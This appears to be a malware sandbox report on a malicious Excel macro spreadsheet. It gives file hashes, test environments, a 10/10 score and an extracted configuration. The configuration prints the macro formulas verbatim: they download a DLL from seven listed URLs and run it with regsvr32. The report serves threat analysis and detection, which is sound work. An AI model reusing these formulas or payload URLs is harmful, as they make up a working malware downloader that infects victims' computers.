General
-
Target
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f
-
Size
20KB
-
Sample
241111-wsa57atbmc
-
MD5
bb81f2a0f22a048d07799945931ab8ec
-
SHA1
0c814100efe4675ce01ab4df4787d64ba46d1ce3
-
SHA256
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f
-
SHA512
1507d4117648434128feed29df17ffa87e7d55d23cb038a612682c0d50ec883ffd10ed8672622009c0741e277ef2489f5629e5e6f4ad578e979a10b7e78a06f0
-
SSDEEP
384:+JaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:EiIN3o4FLTCBn9kC+xbLF1
Behavioral task
behavioral1
Sample
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://banrai.ac.th/website/IHI0iNLLWDh9P/
http://bangsoe.dk/__backup/JON6L/
http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
https://barkstage.es/wp-content/S0Q/
https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/
http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/
https://www.manchesterot.co.uk/about-us/LFXAJJIa/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Extracted
https://banrai.ac.th/website/IHI0iNLLWDh9P/
http://bangsoe.dk/__backup/JON6L/
http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
https://barkstage.es/wp-content/S0Q/
https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/
http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/
https://www.manchesterot.co.uk/about-us/LFXAJJIa/
Targets
-
-
Target
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f
-
Size
20KB
-
MD5
bb81f2a0f22a048d07799945931ab8ec
-
SHA1
0c814100efe4675ce01ab4df4787d64ba46d1ce3
-
SHA256
a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f
-
SHA512
1507d4117648434128feed29df17ffa87e7d55d23cb038a612682c0d50ec883ffd10ed8672622009c0741e277ef2489f5629e5e6f4ad578e979a10b7e78a06f0
-
SSDEEP
384:+JaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:EiIN3o4FLTCBn9kC+xbLF1
Score10/10 -